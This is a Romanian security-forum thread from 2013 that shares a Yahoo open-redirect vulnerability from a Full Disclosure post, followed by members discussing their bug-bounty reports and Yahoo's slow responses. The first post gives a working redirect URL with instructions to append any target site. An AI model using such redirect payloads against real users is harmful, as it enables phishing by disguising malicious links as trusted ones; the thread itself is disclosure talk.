dirtycash Posted December 1, 2013 Report Share Posted December 1, 2013 Link Vulnerabil:http://us.ard.yahoo.com/SIG=15n3q5c29/M=289534.11223993.11781333.10885343/D=he/S=18343859:FOOT2/Y=YAHOO/EXP=1274825933/L=YcSUjEKjqNAC2RCjS_sbeRbo0GpsAkv8MK0ACDlS/B=pFuES2KJiR0-/J=1274818733570885/K=FPiTgxmujdul0W5j.k5shQ/A=4808190/R=0/SIG=1136qnvkg/* Exploit Adaugam la sfarsitul link-ului dupa */ site-u dorit, de exemplu : RST.Proof:http://us.ard.yahoo.com/SIG=15n3q5c29/M=289534.11223993.11781333.10885343/D=he/S=18343859:FOOT2/Y=YAHOO/EXP=1274825933/L=YcSUjEKjqNAC2RCjS_sbeRbo0GpsAkv8MK0ACDlS/B=pFuES2KJiR0-/J=1274818733570885/K=FPiTgxmujdul0W5j.k5shQ/A=4808190/R=0/SIG=1136qnvkg/*http://rstforums.comSursa:Full Disclosure: Yahoo Open Redirect Vulnerability - or "Designing vulnerabilities"Rog un moderator sa mute topic-ul la sectiunea Exploit-uri Quote Link to comment Share on other sites More sharing options...
tpad Posted December 1, 2013 Report Share Posted December 1, 2013 (edited) Nice. Edited December 1, 2013 by tpad Quote Link to comment Share on other sites More sharing options...
florin_darck Posted December 1, 2013 Report Share Posted December 1, 2013 Raportat de mine si am primit primit raspunsul asta Thanks for the submission. Can you please let us know the complete POC; step by step instruction for how you created that url. Have you received "Yahoo! has detected potential security problems from following this link; reasons for this may include it being an expired link, etc. Click here at your own risk. " error when you generated this issue?Le-am dat mai multe detalii acum aprx. o saptamana si momentan nu am primit nici un raspunsPS: Am mai raportat o vulnerabilitate tot atunci care a fost validata Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted December 1, 2013 Active Members Report Share Posted December 1, 2013 Raportat de mine si am primit primit raspunsul asta Le-am dat mai multe detalii acum aprx. o saptamana si momentan nu am primit nici un raspunsPS: Am mai raportat o vulnerabilitate tot atunci care a fost validataIn cat timp ti-au raspuns? la mine m-au tinut de o luna ba ca sa le trimit prin formu de bugbouny ba sa le urc video-ul pe youtube si nici acuma nu am un raspuns. Quote Link to comment Share on other sites More sharing options...
florin_darck Posted December 1, 2013 Report Share Posted December 1, 2013 In cat timp ti-au raspuns? la mine m-au tinut de o luna ba ca sa le trimit prin formu de bugbouny ba sa le urc video-ul pe youtube si nici acuma nu am un raspuns.In 8 zile.. Quote Link to comment Share on other sites More sharing options...
awnly3jhc2g Posted December 1, 2013 Report Share Posted December 1, 2013 Primesti ceva pentru asa ceva? Pentru faptul ca raportezi o astfel de problema? Quote Link to comment Share on other sites More sharing options...
SilenTx0 Posted December 1, 2013 Report Share Posted December 1, 2013 Eu am raportat un xss in ro.yahoo.com acum 2 luni si inca nici un raspuns:)) Quote Link to comment Share on other sites More sharing options...
dirtycash Posted December 1, 2013 Author Report Share Posted December 1, 2013 # Florine , e gasit de tine si de Robert ala. Deci cine o sa se aleaga cu ce? Quote Link to comment Share on other sites More sharing options...